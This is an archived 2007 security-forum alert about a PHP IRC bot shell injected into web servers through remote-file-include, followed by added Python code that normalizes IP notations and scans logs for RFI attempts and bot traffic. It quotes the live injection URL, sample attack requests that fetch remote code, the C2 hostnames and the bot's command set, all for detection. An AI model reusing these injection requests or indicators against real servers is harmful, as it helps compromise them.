Paul
CastleCops Founder
 Joined: Feb 22, 2002 Posts: 27351
Posted: Sat Dec 01, 2007 1:38 am Post subject: [WsIRT#195] IRC Bot Shell @AS8342
Attack Alert Full Report: /IRC_Bot_Shell_attack195.html
IP Converted: 195.161.119.84
dword = 3282138964
hex1 = 0xc3a17754
hex2 = 0xc3.0xa1.0x77.0x54
oct = 0303.0241.0167.0124
Attackers are attempting to inject this script into vulnerable remote web servers. Once it is successfully installed illegally onto a web server, it attempts an fsockopen connection to one of the following destinations on port 8080:
sunnyplaces.weedns.com
mymusicplace.weedns.com
dns4.bpa.nu
dns3.bpa.nu
dns2.bpa.nu
dns1.bpa.nu
snes.dnip.ne
snes.opendns.be
nses1.dd.blueline.be
xamyx.dnip.net
At that point it randomly generates a user and a nick for what appears to be an IRC-like connection. A real sample is shown once it has logged in:
"MODE cafkassps -x i"
"JOIN ##p md5hash"
"NICK cafkassps"
One of its responses includes:
"NOTICE :VERSION mIRC 6.26 BY Khaled Mardam-Bay"
This script is set up for the attacker to read in commands such as:
ls, cmd, pwd, chown, chmod, get, rm, cd, touch, cat, symlink, uname, opme
et cetera.
The script attempts to be obfuscated. It is nefarious in nature and should be removed immediately. All evidence surrounding the installation of the script should be preserved and sent to law enforcement referencing this ticket.
View CIDR AS8342 Report: http://www.cidr-report.org/cgi-bin/as-report?as=8342
"8342 | RU | ripencc | 1997-06-11 | RTCOMM-AS RTComm.RU Autonomous System"
Extended information for AS8342:
State/Province:
Country: ru
Responsible Domain: rtcomm.ru
Abuse Email: security@rtcomm.ru
Changed status to confirmed attack.
Quote: http://hotraebywka.chat.ru/images/girl?
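The alert lists the attacking IP in four spellings (dword, single hex word, dotted hex, dotted octal). Attackers use these spellings in injected URLs because inet_aton()-style parsers accept all of them, so a blocklist keyed on dotted-decimal alone misses them. The following is an added example, not code from the post or from CastleCops: it renders an address in each of those notations and normalizes any of them back to dotted-decimal. It goes a little beyond the alert by also accepting the short forms inet_aton() allows (fewer than four parts, the last one filling the remaining bytes). The function names are my own.

```python
import ipaddress


def ip_forms(dotted: str) -> dict:
    """Render an IPv4 address in the alternative notations listed in the alert.

    dotted -> dword (single decimal), hex1 (single 0x word),
    hex2 (0x per octet) and oct (leading 0 per octet).
    """
    addr = ipaddress.IPv4Address(dotted)
    n = int(addr)
    octets = addr.packed  # four bytes, network order
    return {
        "dotted": str(addr),
        "dword": str(n),
        "hex1": f"0x{n:08x}",
        "hex2": ".".join(f"0x{b:02x}" for b in octets),
        "oct": ".".join(f"0{b:o}" for b in octets),
    }


def _parse_part(part: str) -> int:
    """Parse one dotted component the way inet_aton() does: 0x = hex, leading 0 = octal."""
    p = part.strip().lower()
    if p.startswith("0x"):
        return int(p[2:], 16)
    if len(p) > 1 and p.startswith("0"):
        return int(p, 8)
    return int(p, 10)


def normalize_ip(text: str) -> str:
    """Collapse any inet_aton()-style spelling to canonical dotted-decimal.

    Accepts 1 to 4 dot-separated parts; as in inet_aton(), the last part
    fills all remaining bytes (so "195.161.30548" is also 195.161.119.84).
    Raises ValueError on anything that is not a valid address.
    """
    parts = text.strip().split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"not an IPv4 spelling: {text!r}")
    values = [_parse_part(p) for p in parts]
    n = 0
    for v in values[:-1]:
        if not 0 <= v <= 255:
            raise ValueError(f"octet out of range in {text!r}")
        n = (n << 8) | v
    remaining = 4 - (len(values) - 1)
    last = values[-1]
    if not 0 <= last < (1 << (8 * remaining)):
        raise ValueError(f"trailing component out of range in {text!r}")
    n = (n << (8 * remaining)) | last
    return str(ipaddress.IPv4Address(n))


if __name__ == "__main__":
    forms = ip_forms("195.161.119.84")
    for key, value in forms.items():
        print(f"{key:6} = {value}")
    for spelling in (forms["dword"], forms["hex1"], forms["hex2"], forms["oct"], "195.161.30548"):
        print(f"{spelling:>24} -> {normalize_ip(spelling)}")
```

Run normalize_ip() over every host you extract from a suspicious URL before comparing it with a blocklist; a plain string compare on "195.161.119.84" would pass "0xc3a17754" straight through.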
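The post describes two things a defender can look for: the injection itself (a URL passed as a query parameter so that a remote-file-include pulls the shell in, with the quoted URL ending in "?" so that whatever the vulnerable script appends is discarded as a query string) and the shell's outbound IRC-style session to one of the listed hosts on port 8080. The code below is an added example, not part of the original post: it scans constructed Apache combined-format access-log lines for absolute URLs in query parameters, and checks an outbound session against the indicators the post gives (listed C2 hostnames, port 8080, a NICK/JOIN handshake, and a CTCP VERSION reply claiming to be mIRC). The log lines, the log format, and the function names are my own assumptions; only the hostnames, the port, the quoted injection URL and the quoted IRC lines come from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Command-and-control destinations and port taken from the alert text.
C2_HOSTS = {
    "sunnyplaces.weedns.com", "mymusicplace.weedns.com",
    "dns4.bpa.nu", "dns3.bpa.nu", "dns2.bpa.nu", "dns1.bpa.nu",
    "snes.dnip.ne", "snes.opendns.be", "nses1.dd.blueline.be", "xamyx.dnip.net",
}
C2_PORT = 8080

# Apache combined-format request line (assumed format for the sample lines below).
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"'
)
ABS_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample log lines (not from the original post); the injected URL in
# the first line is the one quoted at the end of the alert.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Dec/2007:01:12:03 +0000] "GET /index.php?page=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '10.0.0.7 - - [01/Dec/2007:01:12:09 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Dec/2007:01:12:15 +0000] "GET /modules/foo.php?cfg=HTTP://example.test/sh.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.805"',
    '10.0.0.9 - - [01/Dec/2007:01:13:00 +0000] "GET /view.php?ref=https%3A%2F%2Fwww.example.org%2Fdocs HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]


def find_rfi_attempts(access_log_lines):
    """Return one record per query parameter whose value is an absolute URL.

    That is the hallmark of a remote-file-include attempt against code like
    include($_GET['page'] . '.php'): the attacker supplies a URL, and a trailing
    '?' on it turns whatever the script appends into a query string that the
    attacker's server simply ignores.
    """
    hits = []
    for line in access_log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if ABS_URL_RE.match(value):
                hits.append({
                    "client": m.group("client"),
                    "path": parts.path,
                    "param": name,
                    "url": value,
                    "suffix_neutralized": value.endswith("?"),
                })
    return hits


# The bot's login sequence as quoted in the post (CTCP framing is omitted there too).
SAMPLE_BOT_SESSION = [
    "NICK cafkassps",
    "MODE cafkassps -x i",
    "JOIN ##p md5hash",
    "NOTICE :VERSION mIRC 6.26 BY Khaled Mardam-Bay",
]


def scan_bot_session(dst_host, dst_port, client_lines):
    """List the reasons an outbound session from a web server looks like this bot."""
    reasons = []
    if dst_host.lower() in C2_HOSTS:
        reasons.append(f"destination {dst_host} is a listed C2 host")
    if dst_port == C2_PORT:
        reasons.append(f"IRC-style traffic to port {C2_PORT}")
    commands = {line.split(" ", 1)[0].upper() for line in client_lines}
    if {"NICK", "JOIN"} <= commands:
        reasons.append("IRC NICK/JOIN handshake from a web server process")
    if any(l.upper().startswith("NOTICE") and "VERSION MIRC" in l.upper() for l in client_lines):
        reasons.append("CTCP VERSION reply claims to be mIRC")
    return reasons


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_ACCESS_LOG):
        print("RFI attempt:", hit)
    for reason in scan_bot_session("dns1.bpa.nu", 8080, SAMPLE_BOT_SESSION):
        print("bot indicator:", reason)
```

Any absolute URL in a parameter is worth a look, but the fourth sample line shows the caveat: a legitimate referrer-style parameter matches the same heuristic, so in practice pair the match with the trailing-"?" marker, the requesting user agent, or an allowlist of parameters that legitimately carry URLs. On the network side, a PHP process on a Linux web server answering a CTCP VERSION with a mIRC banner is the giveaway the post quotes; the hostname and port checks are only as current as the list.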